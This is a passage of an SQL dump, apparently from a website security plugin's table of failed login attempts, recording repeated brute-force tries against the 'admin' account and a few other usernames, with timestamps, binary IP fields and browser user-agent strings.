Firefox/43.0'),(5879,8049,1629500434.523725,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�H�','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'),(5880,8050,1629500434.940551,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�H�','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'),(5881,8050,1629500434.966293,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�H�','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'),(5882,8051,1629500435.274500,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�H�','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'),(5883,8051,1629500435.283883,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�H�','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'),(5884,8052,1629500435.606983,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�H�','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'),(5885,8054,1629501150.272410,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��n��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5886,8055,1629502065.971384,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5887,8056,1629502973.440905,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��hƬD','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5888,8057,1629503083.433469,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���T','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),(5889,8058,1629503933.589031,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5890,8059,1629504692.606590,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��:��^','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5891,8060,1629504886.145961,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5892,8061,1629505862.533475,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����jQ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5893,8062,1629506312.043038,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���㪽','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(5894,8063,1629506836.054711,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ٓ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5895,8064,1629507852.297757,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5896,8065,1629507931.473207,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����M','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(5897,8066,1629508882.985166,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��l�7�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5898,8067,1629509914.061286,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����4','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5899,8068,1629510959.485566,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e >�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5900,8069,1629511180.638293,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���F��','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(5901,8070,1629512025.736112,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5902,8071,1629513154.560238,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5903,8072,1629514243.687066,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@uK','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5904,8073,1629514433.100419,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���1N','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'),(5905,8074,1629515396.052628,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5906,8075,1629516071.720930,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H�*','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(5907,8076,1629516544.021972,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5908,8077,1629517673.852849,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5909,8078,1629518270.812313,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����^�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(5910,8079,1629519473.012644,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����R{','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5911,8080,1629519924.244149,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;v�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'),(5912,8081,1629522035.867555,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��+�)�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5913,8082,1629523240.913672,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���wң','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(5914,8083,1629523364.572146,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��m��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5915,8084,1629524674.166817,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����dl','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5916,8085,1629524890.577028,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(5917,8086,1629526039.767090,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5918,8087,1629527253.129905,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[K ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5919,8088,1629527901.261216,1,'loginFailInvalidUsername','endekunori',0,'\0\0\0\0\0\0\0\0\0\0��>�Rt','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5920,8089,1629527901.474739,1,'loginFailInvalidUsername','endekunori',0,'\0\0\0\0\0\0\0\0\0\0��>�Rt','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5921,8090,1629527901.680747,1,'loginFailInvalidUsername','endekunori',0,'\0\0\0\0\0\0\0\0\0\0��>�Rt','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5922,8091,1629527901.877594,1,'loginFailInvalidUsername','endekunori',0,'\0\0\0\0\0\0\0\0\0\0��>�Rt','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5923,8092,1629527902.066727,1,'loginFailInvalidUsername','endekunori',0,'\0\0\0\0\0\0\0\0\0\0��>�Rt','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5924,8093,1629527902.271920,1,'loginFailInvalidUsername','endekunori',0,'\0\0\0\0\0\0\0\0\0\0��>�Rt','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5925,8094,1629527902.481569,1,'loginFailInvalidUsername','endekunori',0,'\0\0\0\0\0\0\0\0\0\0��>�Rt','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5926,8095,1629527902.670598,1,'loginFailInvalidUsername','endekunori',0,'\0\0\0\0\0\0\0\0\0\0��>�Rt','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5927,8096,1629527902.872005,1,'loginFailInvalidUsername','endekunori',0,'\0\0\0\0\0\0\0\0\0\0��>�Rt','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5928,8097,1629527903.066209,1,'loginFailInvalidUsername','endekunori',0,'\0\0\0\0\0\0\0\0\0\0��>�Rt','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5929,8098,1629527903.237251,1,'loginFailInvalidUsername','endekunori',0,'\0\0\0\0\0\0\0\0\0\0��>�Rt','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5930,8099,1629527903.436221,1,'loginFailInvalidUsername','endekunori',0,'\0\0\0\0\0\0\0\0\0\0��>�Rt','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5931,8100,1629527903.626091,1,'loginFailInvalidUsername','endekunori',0,'\0\0\0\0\0\0\0\0\0\0��>�Rt','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5932,8101,1629527903.865263,1,'loginFailInvalidUsername','endekunori',0,'\0\0\0\0\0\0\0\0\0\0��>�Rt','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5933,8102,1629527904.124442,1,'loginFailInvalidUsername','endekunori',0,'\0\0\0\0\0\0\0\0\0\0��>�Rt','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5934,8103,1629527904.341970,1,'loginFailInvalidUsername','endekunori',0,'\0\0\0\0\0\0\0\0\0\0��>�Rt','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5935,8104,1629527904.525499,1,'loginFailInvalidUsername','endekunori',0,'\0\0\0\0\0\0\0\0\0\0��>�Rt','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5936,8105,1629527904.742834,1,'loginFailInvalidUsername','endekunori',0,'\0\0\0\0\0\0\0\0\0\0��>�Rt','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5937,8106,1629527904.958890,1,'loginFailInvalidUsername','endekunori',0,'\0\0\0\0\0\0\0\0\0\0��>�Rt','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(5938,8108,1629528033.886733,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���-�B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5939,8109,1629528210.467766,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����/�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36'),(5940,8110,1629528676.025802,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��[�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5941,8111,1629529321.998217,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qo�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5942,8112,1629529900.305009,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����@','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(5943,8113,1629529921.438429,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���a�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5944,8114,1629530353.537293,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��E�','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),(5945,8115,1629530527.835463,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-@6�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5946,8115,1629530527.846542,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-@6�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5947,8116,1629531155.320233,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���n��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5948,8117,1629531566.617311,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��*��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'),(5949,8118,1629531776.927368,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5950,8119,1629532419.289666,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���B��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5951,8119,1629532419.379204,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���B��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5952,8120,1629533065.934920,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��4','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5953,8121,1629533197.481346,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��j4��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(5954,8122,1629533553.348926,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��{+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5955,8123,1629534159.129105,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��p�z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5956,8124,1629534758.631132,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Gڿ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5957,8125,1629534800.921002,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N/ɏ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'),(5958,8126,1629535330.681771,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5959,8127,1629535932.694695,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����E.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5960,8128,1629536437.173362,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(5961,8129,1629536563.325998,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5962,8130,1629537217.101188,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��|��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5963,8131,1629538058.630534,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(5964,8132,1629538536.986167,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[K ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5965,8133,1629539229.879609,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e�+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5966,8133,1629539229.930592,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e�+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5967,8134,1629539639.222102,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���(%�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(5968,8135,1629539954.649983,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5969,8136,1629540387.748541,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��?��','Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53'),(5970,8137,1629540478.392188,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5971,8138,1629540483.480847,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5972,8139,1629540493.073106,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5973,8140,1629540500.518198,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5974,8141,1629540507.804584,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5975,8142,1629540513.815111,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5976,8143,1629540517.152551,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5977,8144,1629540520.216539,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5978,8145,1629540522.990558,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5979,8146,1629540528.199729,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5980,8147,1629540531.063791,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5981,8147,1629540531.505162,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5982,8148,1629540533.648534,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5983,8149,1629540536.714452,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5984,8150,1629540538.346959,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5985,8151,1629540539.256023,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5986,8152,1629540540.607843,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5987,8153,1629540542.084886,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5988,8154,1629540544.272712,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5989,8156,1629540673.626142,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5990,8157,1629541235.843495,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�H�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),(5991,8158,1629541395.704350,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5992,8159,1629541482.434759,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�.�','Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0'),(5993,8160,1629542158.766038,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5994,8161,1629542875.970959,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����-%','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(5995,8162,1629542916.009105,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����4','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5996,8163,1629543684.031742,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5997,8164,1629544468.363550,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5998,8165,1629545301.929511,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 